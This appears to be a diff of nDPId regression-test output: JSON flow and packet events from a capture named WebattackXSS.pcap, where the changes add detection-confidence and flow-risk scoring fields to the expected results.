+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347845077,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347845077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347845077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IxAAD4G6UOsEAABwKgKMoIQAFCGLpxOAAAAAKACchB4KAAAAgQFtAQCCAoBPEDCAAAAAAEDAwc="}
@@ -2976,19 +2976,19 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347852742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87IFAAD4G2U6sEAABwKgKMoJiAFDnuKS\/AAAAAKACchAGXwAAAgQFtAQCCAoBPEg+AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":2,"flow_last_seen":1499347852742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347852742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgmLb7idG57ikwKAScSDmbwAAAgQFtAQCCAoD5hmzATxIPgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":3,"flow_last_seen":1499347852743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347852743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07IJAAD4G2VWsEAABwKgKMoJiAFDnuKTA2+4nR4AQAOWFdwAAAQEICgE8SD4D5hmz"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347855324,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347855324,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347855324,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82qpAAD4G6yWsEAABwKgKMoJ8AFBnHpBuAAAAAKACchCYqgAAAgQFtAQCCAoBPErEAAAAAAEDAwc="}
@@ -3018,16 +3018,16 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347864367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SwNAAD4Ges2sEAABwKgKMoLcAFBKORibAAAAAKACchAkLwAAAgQFtAQCCAoBPFOYAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7459,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347864367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgtztJOKwSjkYnKAScSAsRQAAAgQFtAQCCAoD5iUNATxTmAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":3,"flow_last_seen":1499347864368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347864368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SwRAAD4GetSsEAABwKgKMoLcAFBKORic7STisYAQAOXLSwAAAQEICgE8U5kD5iUN"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347865412,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
